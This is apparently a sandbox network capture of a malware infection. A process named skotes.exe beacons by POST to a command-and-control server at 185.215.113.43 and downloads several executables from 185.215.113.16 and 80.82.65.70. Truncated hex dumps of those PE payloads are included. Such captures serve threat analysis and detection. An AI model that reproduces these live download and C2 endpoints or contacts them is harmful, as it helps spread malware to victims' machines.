Dec 13, 2024 18:54:37.736912012 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:38.381747007 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:37 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
Dec 13, 2024 18:54:40.046024084 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:40.792838097 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:40 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49942	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:59.220374107 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014881001&unit=246122658369
Dec 13, 2024 18:54:00.591566086 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49944	185.215.113.16	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:00.737103939 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 13, 2024 18:54:02.056529045 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:01 GMT Content-Type: application/octet-stream Content-Length: 965632 Last-Modified: Fri, 13 Dec 2024 17:36:46 GMT Connection: keep-alive ETag: "675c70ae-ebc00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a6 70 5c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 0c 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELp\g"w@ @@@d\|@hQu4@.text `.rdata@@.datalpH@.rsrchQ@R@@.relocuvF@B
Dec 13, 2024 18:54:02.056615114 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 13, 2024 18:54:02.056639910 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 13, 2024 18:54:02.056916952 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 13, 2024 18:54:02.056934118 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 13, 2024 18:54:02.056948900 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 13, 2024 18:54:02.057379961 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 13, 2024 18:54:02.057395935 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 13, 2024 18:54:02.057410002 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 13, 2024 18:54:02.057737112 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 13, 2024 18:54:02.176546097 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49968	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:06.547214985 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014882001&unit=246122658369
Dec 13, 2024 18:54:07.908698082 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49977	185.215.113.16	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:08.066178083 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 13, 2024 18:54:09.395777941 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:08 GMT Content-Type: application/octet-stream Content-Length: 1818112 Last-Modified: Fri, 13 Dec 2024 17:38:05 GMT Connection: keep-alive ETag: "675c70fd-1bbe00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 8e c1 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*i@ j@M$a$$ $h@.rsrc$x@.idata $z@ +$\|@zzjczccs O~@kizckzqki@.taggant0i"@
Dec 13, 2024 18:54:09.395998955 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:09.396039009 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:09.396075010 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:09.396114111 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:09.396151066 CET	1236	IN	Data Raw: cc 22 21 3c 74 72 29 40 9c 6a 1b a5 a8 68 3b 47 ac 96 a2 5b d8 86 b0 a3 de 6b 78 7c d7 cb 5c 80 8d ef bc 9f f0 37 c0 55 14 9f d7 b8 5c a3 8d dc cc b2 f3 e0 db b8 8c 19 db 75 5a e4 97 a0 75 98 ed ae 62 1b e6 f7 ab e7 b3 da d7 56 d4 c8 54 30 71 11 Data Ascii: "!<tr)@jh;G[kx\|\7U\uZubVT0q''%p!=fse1bc6Cb0`HQ<"13/eGmpX@m2\|],1'URB\/!H4a@W^(r.Ua_QZ_7.7S</cfGw*q}Ll\|k1FEUd7W
Dec 13, 2024 18:54:09.396189928 CET	1236	IN	Data Raw: c3 43 5c c8 f3 2b 3f 18 5a ba 20 a1 38 36 0d 5b 36 7f c5 46 c6 f6 ab 25 09 36 8e 7a be ec 19 74 6a 86 81 6e 4e 43 f8 43 f5 e0 38 43 7e 6a c5 69 34 b4 cd 23 8c ca 2f 9e a7 39 a4 3d a3 f4 99 07 ba cd a4 65 90 b9 99 bb c1 bc b7 e6 74 ef d6 bb c1 7f Data Ascii: C\+?Z 86[6F%6ztjnNCC8C~ji4#/9=et]W$_5r9"5_$j"08et&Vn<`p]85'A-ix$<G#tH[C6}WD_\|$3Ua%$!uY=$HhT
Dec 13, 2024 18:54:09.396588087 CET	1236	IN	Data Raw: 6d 6c 96 3d 58 44 80 61 d0 97 30 36 0f 3f 74 b4 5f 17 6b c0 c5 20 5d 14 d9 51 7c a7 35 47 5c 60 75 43 3f 2e 00 bb 65 06 71 7b 1d 3d f5 45 84 24 78 b3 96 f0 b8 87 94 3e a0 40 20 5e c2 ed 70 3e 62 b9 ac 35 64 9f de b0 af 43 f9 4b 7c 35 20 9e 6a bf Data Ascii: ml=XDa06?t_k ]Q\|5G\`uC?.eq{=E$x>@ ^p>b5dCK\|5 j\D^02d0CHvgt6q$.}ij?,4qp{f0b&5H?$M`(OqUS2)Hvl_3JHdJ+d?W;0h\s{4D;~p45@=vhJ,la-0
Dec 13, 2024 18:54:09.396641970 CET	1236	IN	Data Raw: 99 f4 67 a8 05 cf f5 32 08 37 30 61 de de d8 bd b8 f7 96 32 34 3f b4 a8 dd c8 5d 4c 94 27 f5 32 58 5d df c9 5c 87 d7 de 64 5d 79 38 5c 45 80 5e c1 42 2f 03 e9 57 6d 3d 90 43 10 62 75 83 74 fe a4 7f 6a 7c d8 71 cc 3f 92 3f c4 a4 d4 71 6c a6 78 57 Data Ascii: g270a24?]L'2X]\d]y8\E^B/Wm=Cbutj\|q??qlxWx&j,whAs>egbDEeo>:hL6`s^!&E\]<#w27`H77gjq=CHu\|ljqG)n9s$Meia@Vh`a)2\|7w6dv fpE-7Bue
Dec 13, 2024 18:54:09.396678925 CET	1236	IN	Data Raw: 79 a5 c6 a3 57 71 bd 20 6d 6b 76 50 d8 a0 b1 42 80 71 94 3d 98 37 14 a7 e4 76 e8 40 7c 77 6a 5e b0 57 c8 8d 96 60 7c 4a 1d b0 6a bc 5c 5f 98 aa 6f b3 9c 2f a4 6f 65 f0 28 7e a9 7e 69 17 5a a0 6a 62 d8 6c 86 b6 92 41 40 34 c2 0b 5e b9 7e 2d b4 6d Data Ascii: yWq mkvPBq=7v@\|wj^W`\|Jj\_o/oe(~~iZjblA@4^~-m\|mQyj\^cZj%j\[%nuZtEvDqdpWL3v7>PJ&75Tx mdv`S^2^eU=j]Aw\2qx<x~2Q&]2@h]]uH0&Mf6.L7k
Dec 13, 2024 18:54:09.516573906 CET	1236	IN	Data Raw: 59 50 36 6a 74 45 49 5f af 53 77 86 84 6f 36 33 7c 73 a2 9c f5 71 62 74 f1 8b 98 6a b8 cf 6a 34 dd b8 4c df b9 d2 68 88 6d 50 cc 30 f0 5e 8c fb a7 b6 7c a0 6a 71 00 45 08 a0 c4 e5 00 27 97 6a 94 45 44 a1 96 e2 98 a3 a2 b3 d5 32 ac 71 96 b9 e5 45 Data Ascii: YP6jtEI_Swo63\|sqbtjj4LhmP0^\|jqE'jED2qEH%Pv0qePP_&#>\|p:S<@vPz hq]2x72d[y&Dj,E7e8q(Rpd$S$gP!UDs<yPsaXWOh"nF\;*b&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	50000	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:17.420478106 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014883001&unit=246122658369
Dec 13, 2024 18:54:18.749454021 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	50005	185.215.113.16	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:18.902666092 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 13, 2024 18:54:20.225424051 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:19 GMT Content-Type: application/octet-stream Content-Length: 2812928 Last-Modified: Fri, 13 Dec 2024 17:37:12 GMT Connection: keep-alive ETag: "675c70c8-2aec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 ba f6 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +`Ui` @ @.rsrc`2@.idata 8@ywoaerci:@srexvxqu @+@.taggant@`+"*@
Dec 13, 2024 18:54:20.225460052 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:20.225476980 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:20.225606918 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:20.225625038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:20.225641966 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:20.225660086 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
